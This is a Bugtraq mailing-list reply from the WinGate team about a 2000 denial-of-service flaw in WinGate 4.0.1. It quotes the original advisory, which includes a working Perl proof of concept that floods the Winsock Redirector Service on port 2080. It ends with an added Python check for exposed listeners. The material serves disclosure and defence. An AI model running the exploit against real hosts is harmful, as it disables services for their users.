[16998] in bugtraq
Re: Wingate 4.0.1 denial-of-service
daemon@ATHENA.MIT.EDU (Doug Kassuba)
Mon Oct 2 18:13:03 2000
Message-Id: <20001002185134.440.qmail@securityfocus.com>
Date: Mon, 2 Oct 2000 18:51:34 -0000
Reply-To: Doug Kassuba <dkassuba@I2K.NET>
From: Doug Kassuba <dkassuba@I2K.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

We used your information to analyse this weakness and it was fixed for the next release, which will be the beta version of WinGate 4.1. This is currently available at http://wingate.deerfield.com/beta

For normal use it is not too serious a vulnerability as the Winsock Redirector Service is by default only bound to the local network adaptors and there is no point in binding it to public (internet) adaptors, meaning that the attack would have to be launched from within the LAN. GateKeeper will warn the operator when they bind the Winsock Redirector Service to a public adaptor.

WinGate Development Team

> =================================================================
> Blue Panda Vulnerability Announcement: Wingate 4.0.1
> 02/10/2000 (dd/mm/yyyy)
>
> bluepanda@dwarf.box.sk
> http://bluepanda.box.sk/
> =================================================================
>
> Details available in attached file.
>
> Problem: The Wingate engine can be disabled by sending an abnormal string to
> the Winsock Redirector Service. The attack is not logged.
>
> Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions
> (untested).
>
> Immune: Wingate 4.1 Beta A
>
> Vendor status: Notified.
>
> ===================
> Proof of concept:
> ===================
>
> #!/usr/bin/perl
> #
> # wgate401.pl - Wingate 4.0.1 denial-of-service
> # Blue Panda - bluepanda@dwarf.box.sk
> # http://bluepanda.box.sk/
> #
> # ----------------------------------------------------------
> # Disclaimer: this file is intended as proof of concept, and
> # is not intended to be used for illegal purposes. I accept
> # no responsibility for damage incurred by the use of it.
> # ----------------------------------------------------------
> #
> # Causes all Wingate services to become unavailable until the Wingate Engine
> # is restarted. The Winsock Redirector Service must be enabled in order for
> # this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
> #
>
> use IO::Socket;
>
> $host = "host.com";
> $port = "2080";
> $sleepfor = 1;
>
> print "Wingate 4.0.1 denial-of-service
> Blue Panda - bluepanda\@dwarf.box.sk
> http://bluepanda.box.sk/
>
> ----------------------------------------------------------
> Disclaimer: this file is intended as proof of concept, and
> is not intended to be used for illegal purposes. I accept
> no responsibility for damage incurred by the use of it.
> ----------------------------------------------------------
>
> Causes all Wingate services to become unavailable until the Wingate Engine
> is restarted. The Winsock Redirector Service must be enabled in order for
> this to work.\n\n";
>
> # Connect to the Winsock Redirector Service.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Send some characters to the Winsock Redirector Service.
> $buffer = "a" x 1079;
> print $socket "$buffer";
>
> # Wait a few seconds.
> $counter = 0;
> print "Sleeping for $sleepfor seconds.";
> while($counter < $sleepfor) {
>     sleep(1);
>     print ".";
>     $counter += 1;
> }
> print "\n";
>
> # Close the connection. The Winsock Redirector Service should now be
> # disabled.
> close($socket);
>
> # Connect once more to the Winsock Redirector Service. This will disable all
> # other services.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Finished.
> close($socket);
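
The vendor reply above rests on the Winsock Redirector Service being bound only to local network adaptors. The following is an added example, not part of either message and not WinGate code: it scans `netstat -an` output for a listener on the service port that is bound to all adaptors or to a non-LAN address. It assumes the service listens on TCP 2080 (the port the quoted proof of concept uses) and runs on constructed sample output.

```python
import ipaddress

# Assumption: the Winsock Redirector Service listens on TCP 2080,
# the port used in the quoted proof of concept.
WRS_PORT = 2080

# RFC 1918 ranges, treated here as "local network adaptors".
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample of Windows `netstat -an` output (not from the page).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:8010         0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       0.0.0.0:0              LISTENING
  TCP    203.0.113.7:2080       0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2080           0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       192.168.0.23:1044      ESTABLISHED
  TCP    203.0.113.7:80         0.0.0.0:0              LISTENING
"""

def classify(addr):
    """Return 'lan', 'all-adaptors' or 'public' for a bound address."""
    ip = ipaddress.ip_address(addr.strip("[]"))
    if ip.is_unspecified:
        return "all-adaptors"      # 0.0.0.0 covers any public adaptor too
    if ip.is_loopback or ip.is_link_local or any(ip in n for n in LAN_NETS):
        return "lan"
    return "public"

def exposed_listeners(netstat_text, port=WRS_PORT):
    """List (address, kind) for listeners on `port` reachable from off the LAN."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue               # header, UDP, or non-listening socket
        addr, _, local_port = fields[1].rpartition(":")
        if not local_port.isdigit() or int(local_port) != port:
            continue
        try:
            kind = classify(addr)
        except ValueError:
            continue               # unparseable address column, skip
        if kind != "lan":
            findings.append((addr, kind))
    return findings
```

An empty result from `exposed_listeners` on a host's real `netstat -an` output matches the default binding the vendor describes; any entry returned is a binding that GateKeeper would have warned about.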